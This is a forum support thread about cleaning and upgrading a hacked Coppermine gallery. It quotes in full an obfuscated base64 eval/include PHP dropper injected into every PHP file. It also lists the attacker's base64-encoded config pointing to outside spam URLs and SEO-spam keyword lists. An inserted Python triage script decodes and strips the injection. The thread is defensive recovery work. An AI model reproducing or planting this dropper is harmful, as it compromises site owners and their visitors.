Error Upgrading hacked gallery 1.48 to 1.5x

Started by stoeby, January 24, 2011, 09:37:07 PM


stoeby

I got the gallery (admin name and password) half a year ago, because the old admin could no longer do this and no one cared about it. http://www.turnabteilung-medienarchiv.de/cpg148/
I could not log in to the admin site. All pictures and albums were there, but trying to log in failed, due to the missing website. The URL was just gone. Tried to get support from the hoster via email, no success. CPG was pretty new to me.
Then a month ago, the whole gallery could not be opened either: access denied...
Calling the hosting company, he told me it might be hacked and that I should reinstall the gallery.
So I did. I still need the 2000 photos in about 20 albums. In phpMyAdmin they are still available in the database. Via FTP I made a backup of the CPG148 folders.

I followed the instructions on upgrading from 1.4x to 1.5x.
(I was not able to identify running plugins or bridges.)
I put the CPG folder via FTP into htdocs\cpg148, except \albums and \config.inc.php, and ran update.php.
Now, when opening http://www.turnabteilung-medienarchiv.de/cpg148/, I get the following message: "fs: 254847 [need: 254668]". What does that mean?
So I tried to run install.php. I had to delete config.inc.php.
It also told me to set register_globals=off; I will call the hosting company about this tomorrow.
I put config.inc.php back from the broken dump, but the error is the same.

At least I cannot access the structure of the 2000 files and albums; the backed-up files without the structure are useless.
I would like to recreate the existing structure of the broken CPG 1.48 on a safe new CPG 1.5x. Any idea???
If any information is missing, I'll try to find it.

Additionally I set up an install of cpg 1.5x in a separate folder.
http://www.turnabteilung-medienarchiv.de/Medienarchiv/
It is working fine. Maybe moving the appropriate folders might help? Copying the old \albums to the new \albums gave no success. Not even when using the old config.inc.php.

Thanks in advance


stoeby

Quote from: Joe Carver on January 25, 2011, 12:40:38 AM
See the thread: Yikes, I've been hacked! Now what?
Thank you very much, Joe!
While following all the steps in sanitizing my gallery folder, I noticed this one line as the first line of all *.php files inside the top folder and the sub-folders, e.g. anycontent.php, config.php, ...
"<?php /* <!-----hkycbJXRsBrtlTUKYvpF-----> */ $LjbMUSesTdur = base64_decode("JSVQQVRIJSUvJSVBRERQSFAlJQ==");  @include_once $LjbMUSesTdur;/* <!-----hkycbJXRsBrtlTUKYvpF-----> */?><?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy93ZWIvMS8wMDAvMDQzLzc3MC8xNjQwMTIvaHRkb2NzL2NwZzE0OC9hbGJ1bXMvdXNlcnBpY3MvMTAwMDEvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
<?php"

I am not very familiar with PHP programming, but this line seems unusual there. Is this correct? Might this be the reason for my problem? Or has this line no effect?
I have to decide whether to clean all infected files (takes time) or to delete them, but I don't know if the gallery structure will be damaged by deleting all the files.

Thanks

stoeby

In case I decide on a manual cleanup of every file, I have to clean the following (see attachment). But to me, most of these files in the top folder *\cpg148 (which is used here as the working directory) seem unknown.
I don't know whether these files are the result of installed plugins or bridges. I got the gallery as it is. Hacked! So probably some files have been put there by an intruder.
Should I just compare the folder with a current 1.52 folder and delete all the unknown files listed in "WinMerge" (see attachment)???
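
An added triage script, not code from the post and not Coppermine's own code: it decodes the base64 arguments of a dropper line like the one quoted in the previous post, strips that line when it sits in front of a file's own `<?php` tag, decodes `base64key = "base64value"` lines of the kind quoted further down for the cnf file, and compares the infected tree with a fresh release tree (what the WinMerge comparison asks about above). The only real data are the two base64 strings copied from the quoted line; the directory layout, file contents and the `release` reference tree built by `demo()` are constructed for the example.

```python
"""Triage a PHP tree carrying a one-line base64/eval injection.

Added example; not from the forum post and not Coppermine code. Assumes the
injected prefix is one line of `<?php ... ?>` blocks that base64-decode a
string and eval()/include it, placed in front of the file's own `<?php` tag.
The two base64 strings are copied from the quoted line; everything else
(paths, file contents, the reference tree) is constructed.
"""
import base64
import hashlib
import re
import tempfile
from pathlib import Path

B64_INCLUDE = "JSVQQVRIJSUvJSVBRERQSFAlJQ=="
B64_EVAL = (
    "aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109"
    "Jy93ZWIvMS8wMDAvMDQzLzc3MC8xNjQwMTIvaHRkb2NzL2NwZzE0OC9hbGJ1bXMvdXNlcnBpY3MvMTAwMDEvc3R5bGUuY3NzLnBocCc7"
    "aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ=="
)
# The dropper line as quoted in the post, rebuilt from the two strings above.
SAMPLE_INJECTED_LINE = (
    '<?php /* <!-----hkycbJXRsBrtlTUKYvpF-----> */ $LjbMUSesTdur = base64_decode("'
    + B64_INCLUDE + '");  @include_once $LjbMUSesTdur;'
    "/* <!-----hkycbJXRsBrtlTUKYvpF-----> */?><?php /**/eval(base64_decode('"
    + B64_EVAL + "')); ?>"
)
B64_ARG = re.compile(r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")


def b64_text(s):
    """Decode one base64 string to text; return a marker instead of crashing on junk."""
    try:
        return base64.b64decode(s, validate=True).decode("utf-8", "replace")
    except ValueError as exc:
        return "<undecodable: %s>" % exc


def decode_payloads(line):
    """Decode every base64_decode("...") argument found on one line of PHP."""
    return [b64_text(b) for b in B64_ARG.findall(line)]


def is_injected(first_line):
    """Heuristic for the dropper line: a self-closing PHP block that decodes base64 and evals/includes it."""
    line = first_line.strip()
    return (line.startswith("<?php") and line.endswith("?>")
            and "base64_decode(" in line and ("eval(" in line or "include" in line))


def strip_injection(text):
    """Return (cleaned_text, payloads); strip only when the dropper line precedes the file's own <?php tag."""
    head, sep, rest = text.partition("\n")
    if sep and is_injected(head) and rest.lstrip().startswith("<?php"):
        return rest, decode_payloads(head)
    return text, []


def decode_kv(text):
    """Decode `base64key = "base64value"` lines such as the cnf file quoted in the thread."""
    out = {}
    for line in text.splitlines():
        key, sep, val = line.partition(" = ")
        if sep:
            out[b64_text(key.strip())] = b64_text(val.strip().strip('"'))
    return out


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root):
    """Map relative path -> decoded payloads for every *.php file whose first line looks injected."""
    root, hits = Path(root), {}
    for p in sorted(root.rglob("*.php")):
        with open(p, encoding="utf-8", errors="replace") as fh:
            first = fh.readline()
        if is_injected(first):
            hits[p.relative_to(root).as_posix()] = decode_payloads(first)
    return hits


def compare_trees(suspect, clean):
    """Classify the suspect tree against a fresh release tree (what WinMerge does by hand)."""
    suspect, clean = Path(suspect), Path(clean)
    res = {"unknown": [], "modified": [], "scripts_in_albums": []}
    for p in sorted(suspect.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(suspect).as_posix()
        if rel.startswith("albums/") and p.name.endswith(".php"):
            res["scripts_in_albums"].append(rel)  # PHP has no business under albums/
        ref = clean / rel
        if not ref.is_file():
            res["unknown"].append(rel)
        elif sha256_file(p) != sha256_file(ref):
            res["modified"].append(rel)
    return res


def demo():
    """Build a constructed infected tree plus a clean reference in a temp dir and run all checks."""
    clean_index = "<?php\n// constructed stand-in for a core file\necho 'gallery';\n"
    with tempfile.TemporaryDirectory() as tmp:
        clean, suspect = Path(tmp) / "release", Path(tmp) / "cpg148"
        for root in (clean, suspect):
            (root / "include").mkdir(parents=True)
            (root / "include" / "init.inc.php").write_text("<?php\n// untouched core file\n")
        (clean / "index.php").write_text(clean_index)
        (suspect / "index.php").write_text(SAMPLE_INJECTED_LINE + "\n" + clean_index)
        (suspect / "config.inc.php").write_text("<?php\n// site config; expected to differ from a release\n")
        drop = suspect / "albums" / "userpics" / "10001"
        drop.mkdir(parents=True)
        (drop / "style.css.php").write_text("<?php /* constructed stand-in for the dropper */\n")
        (drop / "kwd").write_text("prom hairstyles\n")
        hits = scan_tree(suspect)
        diff = compare_trees(suspect, clean)
        cleaned, payloads = strip_injection((suspect / "index.php").read_text())
    return {"hits": hits, "diff": diff, "payloads": payloads,
            "cleaned_is_original": cleaned == clean_index}
```

Decoding the quoted line shows what it does: the first payload is an unsubstituted template string, `%%PATH%%/%%ADDPHP%%`, whose `@include_once` fails silently; the second includes `albums/userpics/10001/style.css.php` and, if that file defines `gml` and `dgobh`, registers `dgobh` as an output-buffer callback, so the included file can rewrite every page the gallery serves. That is why the userpics directory holds the rest of the kit and why `albums/` must not be excluded from the comparison even though it is not part of the release. Stripping the prefix is for reading what was underneath; core files still get replaced with fresh release copies rather than patched.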

stoeby

There are also unknown files in *albums\userpics\10001 (see attachment)! I will also delete them because they look malicious.
bi-file is a list of IPs.
cnf-file has the following line: HR0cDovL3Vyb2R0ZHMud3MvaW4uY2dpPzIyJnBhcmFtZXRlcj0ka2V5d29yZCZzZT0kc2Umc2VvcmVmPSVyZWYlJkhUVFBfUkVGRVJFUj0lc2VsZl91cmwlJmRlZmF1bHRfa2V5d29yZD0la3cl"
ZGdzdQ== = "aHR0cDovL3Vyb2R0ZHMud3MvaW4uY2dpPzcmcGFyYW1ldGVyPSVrdyUmSFRUUF9SRUZFUkVSPSVzZWxmX3VybCU="
ZGd1aA== = "aHR0cDovL25vbXNhdDIyLm5ldC87aHR0cDovL25zc2F0Mi5jb20vO2h0dHA6Ly93cGxzYXQyMi5uZXQv"
ZGdpZA== = "ZWM1Y2U4NTktYmE5NC1jMDRjLTA0OWYtYzliMTZiNTc5YTkz"
ZGd0 = Mg==
cHJs = MA==
c3Q= = "UEhOMGVXeGxQaU5pZEhSa0lIdHdiM05wZEdsdmJqcGhZbk52YkhWMFpUdHZkbVZ5Wm14dmR6cGhkWFJ2TzJobGFXZG9kRG93TzNkcFpIUm9PakE3ZlR3dmMzUjViR1UrUEdadmJuUWdhV1E5SW1KMGRHUWlQZz09"
ZWQ= = "UEM5bWIyNTBQZz09"
bGJw = Mg==
ZGdibG8= = MQ==
ZnJi = MA==
ZGdzcg== = MQ==
ZGdzdA== = MjQ=
ZnI= = MA==
a3dy = MQ==
ZGd0aGVtZQ== = "Z29vZ2xlX3RyZW5kcw=="
Z2M= = ""
Z2Q= = MzA=
bWw= = NTA=
YXA= = "L2NwZzE0OC9pbmRleC5waHAv"
c2Rs = MA==
Z3o= = MA==

csi-file: "89.74.155.71|1273941107"
kwd-file: "prom hairstyles"
lb-file: empty
lock-file: empty
rlf-file: 15-05-2010 - 126-12-2010 - 1
skwd-file has a list of keywords like this: "tramadol
blackjack
craps
onlinecasino
propecia
..."

swf-file: binary content starting with "CWS" (the rest is unprintable binary data and is omitted here)

Αndré

Quote from: stoeby on January 25, 2011, 12:17:01 PM
I have to decide whether to clean all infected files (takes time) or to delete them, but I don't know if the gallery structure will be damaged by deleting all the files.
Instead of manual cleaning core files, you should replace them with fresh copies of the latest Coppermine release (as described in the upgrade docs).

stoeby

Quote from: Αndré on January 25, 2011, 02:24:57 PM
Instead of manual cleaning core files, you should replace them with fresh copies of the latest Coppermine release (as described in the upgrade docs).
Yes, so I did.
After sanitizing the hacked gallery following the instructions from here: http://forum.coppermine-gallery.net/index.php/topic,51927.0.html Yikes, I've been hacked! Now what?,
and upgrading the cleaned folder following the instructions from here: http://documentation.coppermine-gallery.net/en/upgrading.htm,

I have all the folders and photos (the structure) available again. I still need to harden the gallery against new attacks.
5 hours of sanitizing time saved me about 10 days of creation time for a new structure.
Thank you very much.

SOLVED!!!